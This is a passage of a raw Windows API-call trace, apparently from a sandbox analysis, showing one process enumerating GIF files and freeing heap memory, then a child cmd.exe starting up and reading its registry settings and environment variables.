dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01299_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01300_.GIF", cAlternateFileName="")) returned 1 [0175.204] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01301_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2076, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01304G.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x172, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01330_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x899, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01734_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01740_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x253, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01742_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4d5, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01743_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x31f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01744_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01745_.GIF", cAlternateFileName="")) returned 1 [0175.205] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01746_.GIF", cAlternateFileName="")) returned 1 [0175.206] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x387, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01747_.GIF", cAlternateFileName="")) returned 1 [0175.206] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110c9494, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110c9494, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01748_.GIF", cAlternateFileName="")) returned 1 [0175.206] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f08c | out: lpFindFileData=0x391f08c*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x104b75c6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b4, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WB01749_.GIF", cAlternateFileName="")) returned 1 [0175.210] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0175.210] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3f07278 [0176.069] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f27288 | out: hHeap=0x710000) returned 1 [0176.069] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0176.069] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0176.094] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0176.098] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0176.105] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0176.105] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0176.112] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0176.116] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0176.124] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0179.298] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0179.299] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0179.792] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0179.795] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0179.796] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0181.454] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f582a0 | out: hHeap=0x710000) returned 1 [0181.454] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3ea2230 | out: hHeap=0x710000) returned 1 [0181.842] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0181.847] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.277] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0183.300] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f17280 | out: hHeap=0x710000) returned 1 [0183.303] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f07278 | out: hHeap=0x710000) returned 1 [0183.321] HeapFree (hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240) [0183.321] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0183.325] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0183.325] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0183.326] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0185.887] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3eb3240 | out: hHeap=0x710000) returned 1 [0186.184] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.204] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.312] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.456] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.502] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.573] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 [0186.620] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3f782b0 | out: hHeap=0x710000) returned 1 Thread: id = 26 os_tid = 0x10f4 Thread: id = 27 os_tid = 0x10fc Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x124b4000" os_pid = "0x1160" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x1260" cmd_line = "\"C:\\WINDOWS\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x115c [0171.424] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff6e4040000 [0171.424] __set_app_type (_Type=0x1) [0171.424] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6e4056d00) returned 0x0 [0171.424] __getmainargs (in: _Argc=0x7ff6e4079200, _Argv=0x7ff6e4079208, _Env=0x7ff6e4079210, _DoWildCard=0, _StartInfo=0x7ff6e407921c | out: _Argc=0x7ff6e4079200, _Argv=0x7ff6e4079208, _Env=0x7ff6e4079210) returned 0 [0171.425] _onexit (_Func=0x7ff6e4057fd0) returned 0x7ff6e4057fd0 [0171.425] _onexit (_Func=0x7ff6e4057fe0) returned 0x7ff6e4057fe0 [0171.425] _onexit (_Func=0x7ff6e4057ff0) returned 0x7ff6e4057ff0 [0171.425] _onexit (_Func=0x7ff6e4058000) returned 0x7ff6e4058000 [0171.425] _onexit (_Func=0x7ff6e4058010) returned 0x7ff6e4058010 [0171.426] _onexit (_Func=0x7ff6e4058020) returned 0x7ff6e4058020 [0171.426] GetCurrentThreadId () returned 0x115c [0171.426] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x115c) returned 0x70 [0171.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffce9120000 [0171.426] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0171.426] SetThreadUILanguage (LangId=0x0) returned 0x409 [0172.695] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0172.696] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33a02ffc78 | out: phkResult=0x33a02ffc78*=0x0) returned 0x2 [0172.696] VirtualQuery (in: lpAddress=0x33a02ffc64, lpBuffer=0x33a02ffbe0, dwLength=0x30 | out: lpBuffer=0x33a02ffbe0*(BaseAddress=0x33a02ff000, AllocationBase=0x33a0200000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0172.696] VirtualQuery (in: lpAddress=0x33a0200000, lpBuffer=0x33a02ffbe0, dwLength=0x30 | out: lpBuffer=0x33a02ffbe0*(BaseAddress=0x33a0200000, AllocationBase=0x33a0200000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0172.696] VirtualQuery (in: lpAddress=0x33a0201000, lpBuffer=0x33a02ffbe0, dwLength=0x30 | out: lpBuffer=0x33a02ffbe0*(BaseAddress=0x33a0201000, AllocationBase=0x33a0200000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0172.696] VirtualQuery (in: lpAddress=0x33a0204000, lpBuffer=0x33a02ffbe0, dwLength=0x30 | out: lpBuffer=0x33a02ffbe0*(BaseAddress=0x33a0204000, AllocationBase=0x33a0200000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0172.696] VirtualQuery (in: lpAddress=0x33a0300000, lpBuffer=0x33a02ffbe0, dwLength=0x30 | out: lpBuffer=0x33a02ffbe0*(BaseAddress=0x33a0300000, AllocationBase=0x33a0300000, AllocationProtect=0x4, __alignment1=0xffff9302, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0172.696] GetConsoleOutputCP () returned 0x1b5 [0173.101] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff6e407fbb0 | out: lpCPInfo=0x7ff6e407fbb0) returned 1 [0173.101] SetConsoleCtrlHandler (HandlerRoutine=0x7ff6e4068150, Add=1) returned 1 [0173.102] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.102] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6e407fc04 | out: lpMode=0x7ff6e407fc04) returned 0 [0173.102] _get_osfhandle (_FileHandle=0) returned 0x248 [0173.102] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6e407fc00 | out: lpMode=0x7ff6e407fc00) returned 0 [0173.102] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.102] SetConsoleMode (hConsoleHandle=0x254, dwMode=0x0) returned 0 [0173.102] _get_osfhandle (_FileHandle=1) returned 0x254 [0173.102] GetConsoleMode (in: hConsoleHandle=0x254, lpMode=0x7ff6e407fc08 | out: lpMode=0x7ff6e407fc08) returned 0 [0173.102] _get_osfhandle (_FileHandle=0) returned 0x248 [0173.102] GetConsoleMode (in: hConsoleHandle=0x248, lpMode=0x7ff6e407fc0c | out: lpMode=0x7ff6e407fc0c) returned 0 [0173.102] GetEnvironmentStringsW () returned 0x1e82e4b5a10* [0173.102] GetProcessHeap () returned 0x1e82e4b0000 [0173.103] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xa7c) returned 0x1e82e4b64a0 [0173.103] FreeEnvironmentStringsA (penv="A") returned 1 [0173.103] GetProcessHeap () returned 0x1e82e4b0000 [0173.103] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0x8) returned 0x1e82e4b6f30 [0173.103] GetEnvironmentStringsW () returned 0x1e82e4b5a10* [0173.103] GetProcessHeap () returned 0x1e82e4b0000 [0173.103] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xa7c) returned 0x1e82e4b6f50 [0173.103] FreeEnvironmentStringsA (penv="A") returned 1 [0173.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33a02feb28 | out: phkResult=0x33a02feb28*=0x7c) returned 0x0 [0173.103] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x4, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.103] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x1, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.103] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x1, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x0, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x40, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x40, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x40, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.104] RegCloseKey (hKey=0x7c) returned 0x0 [0173.104] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33a02feb28 | out: phkResult=0x33a02feb28*=0x7c) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x40, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x1, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x1, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x0, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x9, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x4, lpData=0x33a02feb40*=0x9, lpcbData=0x33a02feb24*=0x4) returned 0x0 [0173.104] RegQueryValueExW (in: hKey=0x7c, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33a02feb20, lpData=0x33a02feb40, lpcbData=0x33a02feb24*=0x1000 | out: lpType=0x33a02feb20*=0x0, lpData=0x33a02feb40*=0x9, lpcbData=0x33a02feb24*=0x1000) returned 0x2 [0173.104] RegCloseKey (hKey=0x7c) returned 0x0 [0173.104] time (in: timer=0x0 | out: timer=0x0) returned 0x5e86d14b [0173.104] srand (_Seed=0x5e86d14b) [0173.104] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0173.104] malloc (_Size=0x4000) returned 0x1e82e7154f0 [0173.105] GetCommandLineW () returned="\"C:\\WINDOWS\\system32\\cmd.exe\"" [0173.105] malloc (_Size=0xffce) returned 0x1e82e3b0080 [0173.106] ??_V@YAXPEAX@Z () returned 0x1e82e3b0080 [0173.106] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x1e82e3b0080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0173.106] malloc (_Size=0xffce) returned 0x1e82e3c0060 [0173.107] ??_V@YAXPEAX@Z () returned 0x1e82e3c0060 [0173.107] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e82e3c0060, nSize=0x7fe7 | out: lpFilename="C:\\WINDOWS\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.108] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0173.108] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.108] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.108] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.108] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.108] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.108] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.108] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.108] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.108] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.108] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.108] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.108] GetProcessHeap () returned 0x1e82e4b0000 [0173.108] RtlFreeHeap (HeapHandle=0x1e82e4b0000, Flags=0x0, BaseAddress=0x1e82e4b64a0) returned 1 [0173.108] GetEnvironmentStringsW () returned 0x1e82e4b5a10* [0173.108] GetProcessHeap () returned 0x1e82e4b0000 [0173.108] RtlAllocateHeap (HeapHandle=0x1e82e4b0000, Flags=0x8, Size=0xa94) returned 0x1e82e4b7a10 [0173.109] FreeEnvironmentStringsA (penv="A") returned 1 [0173.109] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0173.109] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff6e407bb90, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.109] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.109] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.109] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.109] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.109] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.109] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.109] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.109] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.109] malloc (_Size=0xffce) returned 0x1e82e3d0040 [0173.109] ??_V@YAXPEAX@Z () returned 